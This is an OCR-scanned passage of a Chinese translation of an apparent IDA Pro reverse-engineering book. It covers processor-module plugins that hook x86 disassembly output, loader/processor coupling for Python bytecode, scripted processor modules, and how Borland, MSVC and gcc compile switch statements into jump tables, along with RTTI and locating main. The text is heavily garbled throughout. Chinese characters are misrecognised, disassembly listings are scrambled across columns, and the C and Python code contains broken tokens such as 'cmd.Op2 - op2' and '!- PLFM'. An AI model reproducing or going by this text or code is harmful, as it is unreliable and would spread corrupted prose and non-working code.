F 面 的 通知 代码 在 processor t 中 声明 ,在 idp.hpp 中 讨论 ， 想 要 拦截 对 处 理 器 各 个 阶段 的 
调用 的 插件 可 能 会 “ 钓 住 ”这 些 代 码 。 
Dcustom ana: 作用 与 u ana 相同 ， 但 任何 新 指令 必须 使 用 一 个 等 于 或 大 于 0x8000 的 
cmd. itype 值 。 
Dcustom emu: 模拟 自 定 义 指 令 类 型 。 如 采 硕 望 调用 处 理 需 现 有 的 模拟 希 ， 可 以 调用 
(*ph.u emu) Oe 
Qücustom out: 为 目 定 义 指 令 提 供 输出 ， 或 为 现 有 指令 提供 目 定 义 输出 。 如 采 布 望 调 用 处 理 
器 的 out 子 数 ， 可 以 调用 (*ph.u out)()。 
Ocustom outop: 输出 一 个 自 定 义 操 作 数 。 如 果 你 希望 调用 处 理 需 现 有 的 outop PRAEC, RTL 
调用 (*ph.u outop)(op)。 
D custom mem: 为 一 个 目 定义 指令 生成 助 记 符 。 
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下 面 的 代码 摘 目 一 个 插件 ， 该 插件 修改 x86 处 理 融 模块 的 输出 ， 用 一 个 cya 指令 蔡 换 leave 
指令 ， 并 交换 包含 两 个 操作 数 的 指令 中 操作 数 的 显示 顺序 ( 类似 于 ATATA ): 





int idaapi init(void) { 
d if (ph.id != PLFM 386) return PLUGIN SKIP; 
e hook to notification point(HT IDP, hook, NULL); 
return PLUGIN KEEP; 


j 


int idaapi hook(void *user data, int notification code, va list va) { 
switch (notification code) { 
case processor t::custom out: { 
if (cmd.itype == NN leave) ( //intercept the leave instruction 
MakeLine(SCOLOR ON SCOLOR INSN "cya" SCOLOR OFF); 
return 2; 


© © 


else if (cmd.0p2.type != o void) { 
//intercept 2 operand instructions 
op t op1 = cmd.Op1; 
op t op2 = cmd.Op2; 
cmd.Op1 = op2; 
cmd.Op2 = op1; 
© (*ph.u out)(); 
cmd.Op1 = op1; 
cmd.Op2 - op2; 
return 2; 


j 





} 
Í 
return 0; 
} 
plugin t PLUGIN = { 
IDP_INTERFACE VERSION, 
© PLUGIN PROC | PLUGIN HIDE | PLUGIN MOD, // plugin flags 


init, // initialize 

term, // terminate. this pointer may be NULL. 

run, // invoke plugin 

comment, // long comment about the plugin 

help, // multiline help about the plugin 

wanted_name, // the preferred short name of the plugin 

wanted hotkey // the preferred hotkey to run the plugin 
n 


这 个 插件 的 init 函数 确认 当前 处 理 器 为 x86 处 理 器 ( @ )， 然 后 “ 钓 住 ”处 理 右 通知 CO). 
在 hook 回调 函数 中 ,插件 处 理 custom out 通知 ， 以 识别 leave 指令 ( 9 )， 并 生成 一 个 替代 的 输 
hf; ( @ )。 对 于 包含 两 个 操作 数 的 指令 ，hook 也 数 会 临时 保存 与 当前 指令 关联 的 操作 数 ， 然 后 
交换 它们 在 指令 中 的 顺序 ， 最 后 调用 x86 处 理 需 的 u_out e ( 6 ) 来 处 理 与 打印 输出 行 有 关 的 
全 部 细节。 在 返回 时 ， 当 前 指令 的 操作 数 还 原 到 它们 最 初 的 顺序 。 最 后 ,插件 的 标志 (@ ) 指出 : 
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插件 应 在 处 理 器 加 载 时 加 载 ， 不 得 在 Edit » Plugins 菜单 中 列 出 ,并 可 以 修改 数据 库 。 下 面 的 输出 
说 明了 该 插件 所 进行 的 自 定义 效果 : 


.text:00401350 push ebp 
@ .text:00401351 MOV 400000h ，edx 
. text :00401356 mov esp, ebp 
@ .text:00401358 mov offset unk 402060, eax 
@ .text:0040135D sub oCh, esp 
. text :00401360 mov edx, [esp48] 
. text :00401364 mov eax, [esp+4] 
@ .text:00401368 mov offset unk 402060, [esp] 
. text :0040136F call sub 401320 
© .text:00401374 cya 
. text :00401375 retn 
可 以 看 到 ， 在 这 4 条 指令 (@ ) 中 ,第 量 作为 第 一 个 操作 数 出 现 ， 且 cya 指令 替代 了 leave 
指令 (©) 


在 第 21 草 中 ， 我 们 将 使 用 目 定义 处 理 融 插件 玫 助 分 析 特 定 类 型 的 模糊 二 进 制 文件 。 
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在 着 手 设 计 处 理 需 模块 时 , 你 需要 考虑 的 一 件 事 情 是 该 处 理 器 是 否 会 与 某 个 特定 的 加 载 右 紧 
密 耦 合 ， 或 者 是 否 能 够 与 所 有 加 载 器 解 耦 。 以 x86 处 理 器 模块 为 例 ， 这 个 模块 不 对 被 反 汇 编 的 文 
件 的 类 型 做 任何 假设 。 因 此 ， 它 可 以 与 一 系列 加 载 需 结合 使 用 ， 如 PE, ELF 和 Mach-O tie. 

同样 ,如果 加 载 器 能 够 独立 于 文件 所 使 用 的 处 理 器 而 处 理 一 种 文件 格式 , 则 说 明 该 加 载 器 能 
人 够 用 于 多 种 用 途 。 例 如 ,无论 是 包含 x86 代码 或 是 ARM 代码 ，PE 加 载 器 都 能 正常 运行 ; 无 论 是 
包含 x86, MIPS 或 SPARC 代码 , ELF 加 载 硕 都 能 正常 运行 ;无 论 是 包含 PPC 或 x86 代码 ,Mach-O 
加 载 器 都 能 正常 运行 。 

实际 中 的 CPU 适用 于 创建 不 依赖 于 特定 的 输入 文件 格式 的 处 理 器 模块 。 另 一 方面 ， 虚 拟 机 
语言 却 造成 更 大 的 挑战 。 虽 然 有 大 量 加 载 器 ( 如 ELF、a.out 和 PE 加 载 器 ) 可 用 于 加 载 在 本 地 硬 
件 上 运行 的 代码 ， 但 虚拟 机 通常 同时 充当 加 载 需 和 CPU。 结 果 ， 对 虚拟 机 来 说 ， 文 件 格式 和 基 
本 的 字 节 人 码 密切 相关 ， 缺 乏 其 中 一 方 ， 另 一 方 将 不 可 能 存在 。 在 开发 Python 处 理 需 模块 的 过 程 
中 , 我 们 曾 多 次 遇 到 这 种 限制 。 许 多 时 候 , 如 果 对 正 被 反 汇 编 的 文件 的 布局 缺乏 更 加 深入 的 了 解 ， 
我 们 将 很 难 生成 更 具 可 读 性 的 输出 。 

为 了 使 Python 处 理 需 能 够 访问 它 所 需要 的 其 他 信息 ， 我 们 可 以 构建 一 个 Python Just zs. D 
特定 Python 处 理 吉 的 方式 配置 数据 库 ， 以 便 Python 处 理 硕 知道 到 底 在 什么 地 方 找到 它 需 要 的 信 
息 。 在 这 种 情况 下 ， 加 载 吉 需要 向 处 理 需 传递 大 量 加 载 需 状态 数据 。 其 中 一 种 方法 是 将 这 些 数据 
存储 在 数据 库 网 络 节点 中 ， 随 后 ， 处 理 器 模块 可 以 获取 这 些 数据 。 

另外 , 也 可 以 构建 一 个 只 可 以 识别 .pyc 文件 的 加 载 需 ,然后 把 所 有 加 载 任 务 交 给 处 理 需 模块 
来 完成 ， 这 样 ， 处 理 需 肯定 知道 如 何 定位 反 汇 编 .pyc 文件 所 需 的 全 部 信息 。 
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通过 人 允许 加 载 需 将 所 有 加 载 操 作 “ 委 派 ” 给 相关 的 处 理 需 模块 ，IDA 帮助 我 们 创建 紧密 耦合 
的 加 载 希 和 处 理 需 模块 。SDK 中 的 Java 加 载 锅 和 Java 处 理 需 模块 就 是 以 这 种 方式 创建 的 。 要 想 
使 加 载 硕 能 够 将 加 载 任 务 委派 给 处 理 喜 模块, 加 载 需 必须 首先 通过 返回 f LOADER 的 文件 类 型 (在 
ida.hpp 中 定义 ) 接受 一 个 文件 。 如 有 果 加 载 硕 由 用 户 选 择 ， 则 加 载 磊 的 load file 函数 应 确保 在 必 
要 时 通过 调用 set processor type( 见 idp.hpp ) 指定 正确 的 处 理 融 类 型 ， 然 后 癌 该 处 理 融 发 送 一 
条 加 载 回 通知 消息 。 为 构建 一 个 紧密 耦合 的 Python 加 载 器 /处 理 器 组 合 ， 我 们 应 使 用 下 面 的 
load file pr E TILES d : 














void idaapi load file(linput t *li, ushort neflag, const char zi? 
if (ph.id !- PLFM PYTHON) ( //shared processor ID 
set processor type("python", SETPROC ALL|SETPROC FATAL); 


j 

//tell the python processor module to do the loading for us 

//by sending the processor t::loader notification message 

if (ph.notify(processor t::loader, li, neflag)) { 
error("Python processor/loader failed"); 


j 


处 理 需 模块 收 到 loader 通知 时 ， 它 将 负责 将 输入 文件 映射 到 数据 库 中 ， 并 确保 它 能 够 访问 
它 在 ana, emu 和 out 阶段 所 需 的 任何 信息 。 读 者 可 以 在 本 书 的 配套 网 站 上 找到 一 个 以 这 种 方式 
运行 的 Python JI as FUA FE ZH tT o 
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在 IDA5.7 中 引入 的 使 用 IDA 的 脚本 语言 创建 处 理 喜 模 块 的 功能 在 一 定 程 度 上 简化 了 处 理 需 
模块 的 创建 过 程 。 最 起 码 , 它 完 全 取消 了 模块 创建 过 程 的 构建 阶段 。Hex-Rays 的 Elias Bachaalany 
在 Hex 博客 "上 的 一 篇 文章 中 介绍 了 脚本 化 处 理 需 模块 ,而 且 IDA 的 EFI 字 市 码 人 处理 还 模块 也 通 
过 Python 脚本 来 实现 ( 参见 <IDADIR>/procs/ebc.py )。 请 注意 ， 虽 然 Hex 博客 文章 提供 了 有 用 的 
o, 但 用 于 编写 处 理 融 模块 的 具体 API 已 有 所 变化 。 开 始 编写 你 自己 的 处 理 需 模块 脚本 的 最 佳 
方法 是 ,使 用 SDK 附带 的 模板 模块 ( 参见 <SDKDIR>/module/script/proctemplate.py )。 除 其 他 内 
容 外 ， 这 个 模板 枚 举 了 Python 处 理 需 模块 所 需 的 所 有 字段 。 

脚本 化 处 理 硕 模块 利用 了 前 面 讨 论 的 几乎 所 有 元 素 。 了 解 这 些 元 素 将 有 助 于 你 顺利 过 渡 到 脚 
本 化 模块 。 此 外 ， 在 开发 你 目 己 的 模块 时 ， 你 可 以 用 IDA CIE IDA 6.1) äm AY 3 个 处 理 
A EUM ENT. E SDK 附带 的 C++ 示例 (涵盖 几 个 文件 并 要 求 你 正确 配置 构建 环境 ) TREE, 
这 两 个 模块 的 结构 更 易于 理解 。 

从 宏观 上 看 ， 以 Python 实现 处 理 硕 模块 需要 完成 下 面 两 个 任务 。 

O 定义 子 类 idaapi .processort, 以 实现 所 有 所 需 的 处 理 带 模块 限 数 ,如 emu , ana out 和 outop。 





























(D 参见 See http://www.hexblog.com/?p=116。 
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Q 定义 返回 处 理 器 类 的 一 个 实例 的 PROCESSOR. ENTRY 函数 ( 而 非 子 类 的 成 员 )。 
下 面 的 代码 列 出 了 所 需 的 一 些 元 素 : 


from idaapi import * 


class demo processor t(idaapi.processor t): 
# Initialize required processor data fields including id and 
# assembler and many others. The assembler field is a dictionary 
# containing keys for all of the fields of an asm t. A list of 
# instructions named instruc is also required. Each item in the list 
# is a two-element dictionary containing name and feature keys. 


# Also define functions required by processor t such as those below. 


def ana(self): 
# analyzer behavior 


def emu(self): 
# emulator behavior 


def out(self): 
# outputter behavior 


def outop(self): 
# outop behavior 


# define the processor entry point function which instantiates 
# and returns an instance of processor t 
def PROCESSOR ENTRY(): 

return demo processor t() 





与 上 面 的 脚本 相 比 ,有 效 的 Python AE H oe Hut e SB AY E Meet, HAT Lait C++ 实现 
的 处 理 带 模块 所 知 的 字段 相对 应 。 编 写 脚 本 后 ， 将 其 复制 到 <IDADIR>/procs H, BA KRR, 














19.8 ”小结 


处 理 需 模块 是 IDA 模块 化 扩展 中 最 复杂 的 模块 ， 我 们 需要 一 段 时 间 学 习 ， 还 要 花 更 多 时 间 
构建 它 。 但 是 ， 如 果 你 处 在 逆 回 工程 的 有 利 市 场 ， 或 者 硕 望 在 逆 回 工程 社区 取得 领先 地 位 ， 那么 
你 肯定 需要 开发 一 个 处 理 右 模块 。 需要 特别 强调 的 是 , 在 开发 处 理 器 时 ， 附 心 和 反复 试验 是 你 取 
得 成 功 的 重要 因素 。 如 果 你 能 够 将 你 开发 的 处 理 器 模块 应 用 于 你 收集 到 的 每 一 个 新 的 二 进 制 文 
件 ， 你 的 努力 工作 就 会 获得 巨大 的 回报 。 

在 本 章 最 后 , 我 们 结束 了 关于 DA 可 扩展 功能 的 讨论 。 在 接 下 来 的 几 章 中 , 我 们 将 讨论 IDA 
在 实际 应 用 程序 中 的 许多 用 法 并 看 一 下 用 户 如 何 使 用 IDA 扩展 执行 各 种 有 趣 的 分 析 任 务 。 
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I 如 果 你 已 经 掌握 了 前 面 的 内 容 ， 你 就 拥有 了 高 效 使 用 IDA 的 基本 技巧 ， 更 重要 的 
是 , 能 让 IDA 为 你 工作 。 作为 初学 者 , 下 一 步 该 学 习 如 何 适 应 二 进 制 文件 (而 非 IDA ) 
将 扔 给 你 的 “忍者 星 ” 飞 镖 了 。 根 据 你 分 析 汇 编 语 言 的 动机 ， 你 要 么 对 你 分 析 的 代码 非常 熟悉 ， 
要 么 对 它 一 无 所 知 。 如 果 你 碰巧 花费 了 大 量 时 间 研 究 在 Linux 平台 上 使 用 gee 编译 的 代码 , 那么 ， 
你 可 能 非常 熟悉 它 生 成 的 代码 的 风格 。 男 一 方面 ， 如 有 果 有 人 给 你 一 个 使 用 Microsoft Visual C++ 
(VCH ) 编译 的 调试 版 程序 ,那么 ， 对 于 你 看 到 的 代码 ， 你 会 感到 十 分 困惑 。 晋 意 软 件 分 析 人 员 
尤其 会 遇 到 各 种 类 型 的 代码 。 即 使 暂时 将 与 模糊 相关 的 主题 放 在 一 边 , 恶意 软件 分 析 人 员 还 是 很 
可 能 会 在 同一 天 下 午 看 到 使 用 Visual Basic; Delphi, Visual C/C++ 等 其 他 语言 创建 的 代码 。 

在 这 一 曹 中 ， 我 们 将 徐 要 讨论 DA 中 各 种 编译 震 的 不 同 之 处 。 这 样 做 的 目的 不 是 为 了 人 研究 
编 详 希 为 何 存 在 差异 ,而 是 为 了 揭示 这 些 差 异 如 何在 反 汇 编 代 码 清单 中 表现 出 来 , 以 及 如 何 解析 
这 些 差 异 。 此 外 ， 用 于 构建 特定 软件 的 编译 右 及 相关 选项 构成 了 分 析 该 软件 作者 的 一 个 数据 点 。 

虽然 存在 大 量 使 用 各 种 语言 的 编译 规 , 但 是 , 在 本 草 的 示例 中 , 我 们 主要 使 用 已 编译 C TC, 
因为 各 种 平台 的 C NG oe. 


20.4 HEX Exi 


C 语言 的 switch 语句 经 常 成 为 编译 需 优 化 的 目标 。 这 类 优化 的 目的 是 将 分 文 变量 与 一 个 有 
效 的 case 标号 以 最 有 效 的 方式 进行 匹配 。 通常, 实现 匹配 的 方法 取决 于 switch 语句 的 case 标号 
的 形式 。 如 果 case 标号 十 分 分 散 ， 如 在 下 面 的 例子 中 : 


switch (value) { 

case 1: 
//code executed when value -- 1 
break; 

case 211: 
//code executed when value -- 211 
break; 

case 295: 
//code executed when value -- 295 
break; 

case 462: 
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//code executed when value -- 462 





break; 
case 1093: 
//code executed when value -- 1093 
break; 
case 1839: 
//code executed when value -- 1839 
break; 
} 
这 时 ， 大 多 数 编译 右 会 生成 代码 ， 进 行 二 进 制 搜索 "， 将 分 支 变 量 与 某 种 情形 (case) 相 
JU Ri 





如 果 case 标号 非 第 集中 ,甚至 是 按 顺序 排列 ， 如 下 所 示 : 


switch (value) { 








case 1: 
//code executed when value -- 1 
break; 
case 2: 
//code executed when value -- 2 
break; 
case 3: 
//code executed when value -- 3 
break; 
case 4: 
//code executed when value -- 4 
break; 
Case 5: 
//code executed when value -- 5 
break; 
case 6: 
//code executed when value -- 6 
break; 
} 
这 时 ， 编 译 器 通常 会 通过 执行 一 次 表 查 找 ?”， 将 分 文 变量 与 相关 情形 的 地 址 相 匹配 ， 以 解析 
分 文 变 量 。 
一 个 switch 语句 的 编译 示例 如 下 所 示 ， 它 根据 连续 的 情形 1 ~ 12 匹配 分 文 变量 : 
.text:00401155 mov edx, [ebp«arg ol 
€ .text:00401158 cmp edx, OCh ; Switch 13 cases 
. text :0040115B ja loc 4011F1 ; default 
. text :0040115B ; jumptable 00401161 case O 


D 对 于 算法 分 析 爱 好 者 来 说 ， 这 表示 分 支 变 量 在 log2 N 操作 后 匹配 ， 这 里 的 NN 是 switch 语句 中 情形 的 数量 。 
© 同样 ， 对 于 算法 分 析 爱 好 者 来 说 ， 使 用 表 查 找 可 以 通过 一 项 操作 ( 可 以 从 算法 类 中 撤销 ) 找到 目标 情形 ， 这 也 叫 
做 常量 时 间或 0(1)。 
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.text: 
.text: 
© .text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
. text: 
.text: 
text: 
.text: 
. text: 
.text: 
.text: 
.text: 
.text: 
© .text: 
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00401161 


00401161 ; 


00401168 
00401168 
00401168 
00401168 
00401168 
00401168 
00401168 
00401168 
00401168 
00401168 
00401168 
00401168 
00401168 


0040119C ; 


0040119C 


3 


off_401168 


3 


编译 器 变 体 


dd offset 
dd offset 
dd offset 
dd offset 
dd offset 
dd offset 
dd offset 
dd offset 
dd offset 
dd offset 
dd offset 
dd offset 


0040119C loc 40119C: 


0040119C 
0040119C 


mov 


loc 40119C 
loc 4011A1 
loc 4011A6 
loc 4011AB 
loc 4011B3 
loc 4011BB 
loc 4011C3 
loc 4011CB 
loc 4011D3 
loc 4011DB 
loc 4011E3 
loc 4011EB 


ds:off 401168[edx*4] ; switch jump 


dd offset @loc 4011F1 


; DATA XREF: sub 401150+11 个 工 
; jump table for switch statement 


; CODE XREF: sub 401150411^ j 
; DATA XREF: sub 401150:0ff 401168 个 o 


eax, [ebprarg 4] ; jumptable 00401161 case 1 


这 个 示例 使 用 IDA 能 够 完全 理解 的 Borland MEITE ah E; IDA 在 分 析 阶 段 插 入 的 注释 
充分 说 明 IDA 清楚 地 知道 : 这 是 一 个 switch 语句 。 在 这 个 例子 中 ， 我 们 注意 到 ，IDA 能 够 识别 
代码 中 的 分 文 测 试 (@ )、 跳 转 表 ( @ ) 和 按 值 确 定 的 各 情形 Ce ). 


在 使 用 跳 转 表 解 析 分 文 情形 时 ， 需 要 注意 的 是 ， 











前 一 个 示例 中 的 表 包 含 13 个 条 目 ， 而 据 我 


们 所 知 ，switch 语句 仅 测试 情形 1 ~ 12。 在 这 种 情况 下 ,编译 需 选 择 包 含 一 个 用 于 情形 0 的 条 目 ， 
而 不 是 把 0 当做 特例 处 理 。 情 形 0 ( @ ) 的 目标 与 1~12 (el 以 外 的 其 他 值 的 目标 相同 。 

最 后 ， 我 们 需要 注意 对 分 支 变量 所 执行 的 测试 的 本 质 。 对 于 不 熟悉 x86 指令 集 的 读者 来 说 ， 
测试 @ 及 随后 行 中 的 相关 跳 转 似乎 仅仅 将 大 于 12 的 值 排除 在 外 ， 而 没有 考虑 到 负 值 。 如 果 是 这 
EE, 那么 可 能 会 造成 灾难 性 的 后 果 , 因为 在 跳 转 表 中 使 用 负 值 可 能 会 导致 无 法 预料 的 结果 。, 不过， 
ja ( 问 上 跳 转 ) 指令 在 进行 比较 时 ,将 比较 值 作为 无 符号 值 处 理 。 因 此 ，-1 ( 0xFFFFFFFF ) 被 看 
做 4294967295， 这 个 值 要 远大 于 12， 因 而 不 在 跳 转 表 的 有 效 索 引 值 的 范围 之 内 。 

使 用 Microsoft Visual C++ 编 译 上 面 的 源 代码 ， 可 以 得 到 下 面 的 反 汇 编 代 码 清单 : 


.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
„text: 
„text: 
© .text : 
:off 401478?0 
„text: 


.text 


wc 


.text: 
«text: 





004013D5 
004013D8 
004013DB 
004013DE 
004013E2 
004013E8 
004013EB 
004013F2 





mov 

€ sub 
mov 
cmp 
ja 
mov 
jmp 


004013F2 loc 4013F2: 


004013F2 


00401477 


mov 


retn 


00401477 sub 4013BO endp 














ecx, [ebprvar 8] 


ecx, 1 


[ebp+var_8], ecx 
[ebp+var 8], @oBh ; switch 12 cases 


loc 40146E 


; jumptable 004013EB default case 


edx, [ebp+var 8] 
ds:off 401478[edx*4] ; switch jump 


; DATA XREF: 


eax, [ebp+targ 4] ; jumptable 004013bB Gcase 0 
REMAINDER OF FUNCTION EXCLUDED FOR BREVITY 


.text:00401477 ; 
© .text:00401478 off 401478 dd offset @loc 4013F2 


. text : 00401478 
. text :00401478 
. text : 00401478 
. text : 00401478 
. text : 00401478 
. text : 00401478 
. text : 00401478 
. text :00401478 
. text :00401478 
. text :00401478 
. text :00401478 


将 这 段 代 码 与 由 Borland 编 详 肖 生成 的 代码 进行 比较 ， 可 以 发 现 几 个 不 同 之 处 。 一 个 明显 的 
不 同 是 跳 转 表 的 位 置 发 生 了 变化 , 它 紧 徘 在 包含 switch 语句 的 函数 后 面 ( 而 使 用 Borland NM LE de 
生成 的 代码 却 将 跳 转 表 舱 入 到 函数 之 中 )。 除 了 更 清楚 地 区 分 代码 和 数据 外 ， 以 这 种 方式 移动 跳 
转 表 的 位 置 不 会 给 程序 的 行为 造成 任何 有 影响。 尽管 代码 的 布局 不 同 , 但 IDA 仍然 能 够 为 switch 
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; DATA XREF: sub 4013B0+3BW r 


dd offset loc 4013FA ; jump table for switch statement 


dd offset loc 401402 
dd offset loc 40140A 
dd offset loc 401415 
dd offset loc 401420 
dd offset loc 40142B 
dd offset loc 401436 
dd offset loc 401441 
dd offset loc 40144C 
dd offset loc 401458 
dd offset loc 401464 











语句 的 关键 功能 提供 注释 ， 包 括 情形 数 以 及 与 每 种 情形 相关 的 代码 块 。 


AX switch 语句 的 一 些 实施 细 市 包括 : 分 文 变量 (这 里 为 var 8) 不 断 递减 ( @ )， 有 效 值 
由 11 减 至 0(@ )， 这 使 得 IDA 可 以 直接 将 变量 用 作 跳 转 表 索 引 ( @ )， 而 不 需要 为 不 使 用 的 情 
形 0 创建 一 个 哑 搬 槽 (dummy slot )。 因 此 ， 跳 转 表 中 的 第 











际 上 引用 的 是 分 文 傅 形 1 的 代码 。 
我 们 以 下 面 由 gec 生成 的 代码 结束 switch 语句 的 比较 : 


. text :004011FA 
. text :004011FE 
. text :00401204 
. text : 00401207 
. text : 0040120A 
. text : 00401210 
. text : 00401212 








@cmp [ebprarg 0], oCh ; switch 13 cases 
ja @loc 40129D ; jumptable 00401210 case O 
mov eax, [ebp«arg ol 
shl eax, 2 


mov Qeax, ds:off 402010[eax] 


e jmp eax 


.text:00401212 @loc 401212: 


.rdata:off 402010 o 


. text : 00401212 


; switch jump 


; DATA XREF: 


eax, [ebprarg 4] ; jumptable 00401210 case 1 
. 5; REMAINDER OF .text SECTION EXCLUDED FOR BREVITY 


Ə .rdata: 


.rdata: 
.rdata: 
.rdata: 
.rdata: 
.rdata: 
.rdata: 
.rdata: 
.rdata: 
.rdata: 


00402010 off 402010 dd offset 1oc 40129D 


00402010 
00402010 
00402010 
00402010 
00402010 
00402010 
00402010 
00402010 
00402010 


dd offset O1oc 401212 
dd offset loc 40121D 
dd offset loc 401225 
dd offset loc 40122D 
dd offset loc 40123C 
dd offset loc 40124B 
dd offset loc 40125A 
dd offset loc 401265 
dd offset loc 401270 


; DATA XREF: sub 4011ED+1D 个 T 
; jump table for switch statement 


SRH CSRETEASIAH)CO)S 
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.Tdata:00402010 dd offset loc 40127B 
.rdata:00402010 dd offset loc 401287 
.rdata:00402010 dd offset loc 401293 


这 段 代 码 与 前 面 的 Borland 代码 存在 一 些 相似 之 处 ， 它 也 有 12 种 情形 ( @ ) 和 包含 13 个 条 
日 的 跳 转 表 ( @ )， 并 使 用 一 个 指针 指 问 跳 转 表 的 情形 0 插 权 中 的 默认 情形 ( @ )。 和 在 Borland 
代码 中 一 样 ， 和 情形 1 处 理 程序 ( @ ) 的 地 址 可 以 在 跳 转 表 中 的 索引 1 处 找到 。gcc 代码 与 前 面 代 
人 码 的 明显 差异 包括 : 执行 跳 转 ( ei 的 风格 不 同 ; 跳 转 表 存 储 在 二 进 制 文件 的 只 读数 据 ( .rdata ) 
节 ， 从 而 将 和 switch 语句 有 关 的 代码 与 执行 switch 语句 所 需 的 数据 隔离 开 来 。 与 其 他 两 个 示例 
一 样 ，IDA 能 够 找到 并 注释 switch 语句 的 关键 元 系 。 

这 里 需要 指出 的 是 , 将 源 代 码 编译 成 汇编 语 言 ， 并 没有 唯一 正确 的 方法 。 熟悉 由 攻 一 特定 的 
编 详 肯 生成 的 代码 , 并 不 能 保证 你 能 够 识别 使 用 一 种 截然 不 同 的 编 诺 闪 (或 者 是 相同 编 详 项 系列 
的 不 同 版 本 ) 编 详 的 高 级 结构 。 更 重要 的 是 ， 不 能 仅仅 因为 IDA 无 法 生成 注释 ， 就 断定 茶 段 代 
人 码 不 是 switch 语句 。 和 你 一 样 ，IDA 也 更 加 束 悉 某 些 编 详 着 的 输出 。 你 不 能 完全 依赖 IDA 的 分 
析 功 能 来 识别 凋 用 的 代码 和 数据 结构 , 而 应 随时 准备 应 用 你 擎 握 的 技能 : 对 给 定 汇 编 语 言 的 了 解 、 
你 的 编译 带 知 识 以 及 正确 解释 一 个 反 汇编 代码 清单 的 搜索 技巧 。 






































20.2 RTTI 实现 


在 第 8 草 中 ， 我 们 讨论 了 C++ RTTI (运行 时 类 型 识别 )， 并 指出 : Mäe D RTTI 时 并 没 
有 标准 的 方法 。 至 于 如 何 目 动 识 别 二 进 制 文件 中 与 RTT 有 关 的 结构 ，IDA 的 这 项 功能 同样 因 上 所 
使 用 的 编译 器 而 异 。 毫 不 奇怪 ， 对 于 使 用 Borland 编译 器 编译 的 二 进 制 文件 ，IDA 在 这 方面 的 功 
能 最 为 强大 。 对 自动 识别 微软 RTTI 数据 结构 感 兴趣 的 读者 ， 可 以 尝试 使 用 IDA Palace 中 Igor 
Skochinsky 的 IDC 脚本 或 者 Sirmabus” 中 的 Class Informer 插件 ， 这 将 在 第 23 章 中 深入 讨论 。 

要 了 解 某 一 特定 编 详 硕 如 何 般 入 C++ 类 的 类 型 信息 ,一 种 简单 的 方法 是 编写 一 个 利用 包含 虚 
哨 数 的 类 的 价 单 程序 。 编 译 该 程序 后 ， 你 就 可 以 将 得 到 的 可 执行 文件 加 载 到 IDA 中 ， 并 搜索 包 
含 程序 所 使 用 的 类 的 名 称 的 字符 串 。 无 论 使 用 什么 编译 问 构 建 二 进 制 文件 ，RTTI 数据 结构 始终 
会 包含 一 个 指 疝 字符 串 的 指针 ,该 字符 串 则 包含 它 所 代表 的 类 的 名 称 。 使 用 数据 交叉 引用 ,你 将 
可 以 定位 一 个 指 问 这 类 字符 串 的 指针 ， 并 在 那里 找到 候选 的 RTTI 数 据 结构 。 最 后 ， 你 需要 将 候 
WAI RTTI 结构 与 相关 类 的 虚 表 关联 起 来 。 要 完成 这 个 任务 ， 最 好 的 办 法 是 从 候选 的 RTTI 结构 
回溯 数据 交叉 引用 ， 下 到 到 达 一 个 男 数 指针 表 C E )。 


























20.3 定位 main 函数 
如 果 你 足够 答 运 ， 拥 有 你 想 要 分 析 的 C/C++ 程序 的 源 人 代码， 那么 ， 最 好 将 main 函数 作为 你 


(D 参见 http://old.idapalace.net/idc/ms rtti.zip。 
(2) 参见 http://www.openrce.org/blog/browse/sirmabus o 
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分 析 的 起 点 ， 因 为 从 理论 上 讲 ， 这 里 是 执行 开始 的 地 方 。 在 分 析 二 进 制 文件 时 ， 这 是 一 个 不 错 的 
策略 。 但 是 ， 如 我 们 所 知 ， 编 译 融 /链接 需 〈 及 库 的 使 用 ) 增加 了 其 他 一 些 在 main 函数 之 前 执行 
的 代码 ， 这 使 得 问题 更 加 复杂 。 因 此 ， 如 果 认 为 程序 作者 所 写 的 main 羡 数 就 是 一 个 二 进 制 文件 
的 入 口 点 ， 这 往往 并 不 准确 。 

实际 上 ， 所 有 程序 都 有 一 个 main 因数 ， 这 仅仅 是 一 个 CAC++ 编 译 天 约定 ， 而 非 在 编写 程序 
时 的 一 个 无 法 变通 的 规则 。 如 果 你 曾经 编写 过 Windows GUI 应 用 程序 ， 那 么 你 一 定 熟悉 main BR 
数 的 WinMain 变 体 。 分 析 C/C++ 以 外 的 程序 时 ， 你 会 发 现 ， 其 他 语言 对 它们 的 入 口 点 子 数 使 用 其 
他 的 名 称 。 无 论 它 叫做 什么 ,我 们 将 这 类 哺 数 统称 为 main EN. 

在 第 12 eh, RIIET IDA 签名 文件 的 概念 ， 如 何 生 成 这 些 文件 以 及 它们 的 应 用 。IDA 
利用 特殊 的 启动 签名 来 识别 一 个 程序 的 main KA WR IDA 能 够 根据 其 签名 文件 中 的 一 个 启动 
顺序 匹配 一 个 二 进 制 文件 的 启动 顺序 ,那么 , IDA 就 能 够 基于 它 对 已 匹配 启动 例 程 的 行为 的 理解 ， 
定位 一 个 程序 的 main 男 数 。 这 种 方法 非常 有 效 ， 除 非 IDA 无 法 将 一 个 二 进 制 文件 中 的 启动 序列 
与 已 知 的 签名 匹配 起 来 。 一 般 而 言 , 程序 的 局 动 代 但 与 生成 该 代码 的 编译 规 及 该 代码 所 针对 的 平 
台 密 切 相 关 。 

如 第 12 半 所 述 ， 启 动 签名 被 集中 在 一 起 ， 存 储 在 特定 于 二 进 制 文件 类 型 的 签名 文件 中 。 例 
W, PE 加 载 硕 使 用 的 局 动 签名 存储 在 pe.sig 文件 中 ， 而 MS-DOS 加 载 器 使 用 的 启动 签名 则 存储 
在 exe.sig 文件 中 。IDA 拥有 给 定 二 进 制 文件 类 型 的 签名 文件 ， 并 不 能 完全 保证 它 能 够 识别 这 类 
程序 的 main 函数 。 由 于 编译 器 的 种 类 极其 繁多 ，IDA 不 可 能 提供 每 一 种 可 能 的 签名 ， 也 就 不 可 
能 拥有 每 一 种 局 动 顺序 。 

对 于 许多 文件 类 型 ， 如 ELF 和 Mach-O，IDA 根本 不 包含 任何 启动 签名 。 因 此 ，IDA 也 就 不 
可 能 使 用 签名 来 定位 一 个 ELF 二 进 制 文件 中 的 main 函数 ( 尽管 如 果 这 个 函数 叫做 main, IDA 就 
能 够 找到 它 )。 

这 一 市 讨论 的 重点 是 你 让 明白 一 个 事实 : 有 时 候 ， 你 必须 自己 设法 定位 一 个 程序 的 main PR 
数 。 在 这 类 情况 下， 你 需要 采取 一 些 方法 了 解 程序 如 何 调 用 main 水 数 。 以 一 个 经 过 一 定 程 度 的 
